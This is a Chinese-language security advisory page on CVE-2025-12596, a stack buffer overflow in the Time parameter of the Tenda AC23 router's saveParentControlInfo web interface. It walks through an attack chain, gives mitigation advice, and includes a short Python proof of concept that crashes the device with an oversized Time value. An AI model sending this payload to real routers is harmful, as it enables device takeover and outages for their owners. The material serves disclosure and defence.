CVE-2025-12596: Tenda AC23 saveParentControlInfo缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-12596

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC23

漏洞概述

CVE-2025-12596是腾达（Tenda）AC23路由器中一个严重的安全漏洞，存在于固件版本16.03.07.52中。该漏洞位于/goform/saveParentControlInfo接口的saveParentControlInfo函数中，攻击者可以通过构造恶意的Time参数触发缓冲区溢出。漏洞的CVSS评分为8.8，属于高危级别，具有网络远程利用的可能性，且不需要高权限认证即可发起攻击。此漏洞可能导致攻击者完全控制路由器设备，窃取敏感信息、植入后门或将其纳入僵尸网络。由于该漏洞的利用代码已公开披露，安全风险进一步加剧。建议使用该型号路由器的用户立即采取防护措施，避免设备暴露在互联网环境中。

技术细节

该漏洞是一个典型的基于栈的缓冲区溢出问题。在Tenda AC23路由器的Web管理界面中，/goform/saveParentControlInfo接口用于处理家长控制功能的配置信息。saveParentControlInfo函数在处理Time参数时，未对输入数据进行充分的边界检查，将用户可控的Time参数直接复制到固定大小的缓冲区中。当Time参数的长度超过缓冲区容量时，超出的数据会覆盖相邻的栈内存区域，包括函数返回地址和保存的寄存器值。攻击者可以通过精心构造超长的Time字符串，覆盖返回地址使其指向恶意代码，从而实现远程代码执行。由于该接口通过HTTP协议处理请求，攻击者可以直接发送恶意数据包，无需认证或仅需低权限账户即可触发漏洞。成功利用后，攻击者可以在路由器上执行任意命令，获取root权限。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标设备为Tenda AC23路由器，确认固件版本为16.03.07.52

STEP 2

步骤2

漏洞探测：访问/goform/saveParentControlInfo接口，确认漏洞存在

STEP 3

步骤3

构造恶意请求：构造包含超长Time参数的HTTP POST请求，触发缓冲区溢出

STEP 4

步骤4

覆盖返回地址：精心构造的溢出数据覆盖栈上的返回地址，指向恶意代码

STEP 5

步骤5

远程代码执行：函数返回时跳转到攻击者控制的代码，执行任意命令

STEP 6

步骤6

持久化控制：植入后门、建立反弹连接，将设备纳入僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-12596 PoC - Tenda AC23 Buffer Overflow in saveParentControlInfo
# Target: Tenda AC23 Firmware 16.03.07.52

import requests
import sys

target_ip = sys.argv[1] if len(sys.argv) > 1 else '192.168.0.1'
target_port = 80

url = f'http://{target_ip}:{target_port}/goform/saveParentControlInfo'

# Buffer overflow payload - 600 bytes for overflowing the buffer
# Pattern to overwrite return address (adjust based on actual offset)
overflow_length = 600
malicious_time = 'A' * overflow_length

# Construct the exploit payload
payload = {
    'Time': malicious_time,
    'page': '1',
    'save': '1'
}

print(f'[*] Sending exploit payload to {url}')
print(f'[*] Payload length: {len(malicious_time)} bytes')

try:
    response = requests.post(url, data=payload, timeout=10)
    print(f'[+] Request sent successfully')
    print(f'[*] Response status: {response.status_code}')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')

# Note: This PoC demonstrates the vulnerability. For actual exploitation,
# you would need to determine the exact offset and craft a ROP chain
# or shellcode to achieve remote code execution.

影响范围

Tenda AC23 固件版本 16.03.07.52

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）禁用路由器的WAN口远程管理功能，仅允许通过局域网访问管理界面；2）在防火墙中限制对80和443端口的访问，只允许受信任的IP地址；3）定期检查路由器日志，关注异常的登录行为和请求模式；4）考虑使用VPN替代直接远程管理；5）监控是否有针对该漏洞的扫描和利用尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12596
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12596
3 Details https://www.cvedetails.com/cve/CVE-2025-12596/
4 VulDB https://vuldb.com/cve/CVE-2025-12596
5 Link https://github.com/LX-LX88/cve/issues/9
6 Link https://vuldb.com/?ctiid.330891
7 Link https://vuldb.com/?id.330891
8 Link https://vuldb.com/?submit.677585
9 Link https://www.tenda.com.cn/
10 Link https://github.com/LX-LX88/cve/issues/9